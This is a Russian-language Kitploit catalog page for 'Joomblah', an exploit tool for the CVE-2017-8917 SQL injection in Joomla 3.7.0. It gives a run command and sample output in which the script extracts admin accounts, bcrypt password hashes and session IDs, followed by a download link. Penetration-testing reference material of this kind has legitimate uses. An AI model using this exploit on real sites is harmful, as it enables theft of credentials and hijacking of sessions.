Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Joomblah — CVE-2017-8917 Эксплойт уязвимости SQL-инъекции в Joomla! 3.7.0 | Kitploit
Инструменты/GitHubGitHub/gloliveira1701/joomblah
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubgloliveira1701/joomblah

Joomblah

CVE-2017-8917 Эксплойт уязвимости SQL-инъекции в Joomla! 3.7.0

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Joomblah

Эксплойт для Joomla 3.7.0 (CVE-2017-8917)

Пояснение уязвимости:

https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

Модификация кода

Изменение в строке 46

root@kitploit:~
...
 result += value.decode('utf-8')
...

Использование

Запустите скрипт joomblah.py, указав уязвимую установку Joomla 3.7.0. Это может занять некоторое время, но в результате будут извлечены таблицы пользователей и сессий.

root@kitploit:~
$ python joomblah.py http://127.0.0.1:8080
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Получение CSRF-токена
 [-] Тестирование SQL-инъекции
  -  Найдена таблица: rlbre_users
  -  Найдена таблица: tgukl_users
  -  Извлечение пользователей из rlbre_users
 [$] Найден пользователь ['361', 'Super User', 'admin', '[email protected]', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
  -  Извлечение сессий из rlbre_session
 [$] Найдена сессия ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
  -  Извлечение пользователей из tgukl_users
 [$] Найден пользователь ['883', 'Super User', 'admin', '[email protected]', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
  -  Извлечение сессий из tgukl_session

Лицензия

Лицензировано в соответствии с WTFPL Авторство: оригинальный код от @XiphosResearch

Скачать инструмент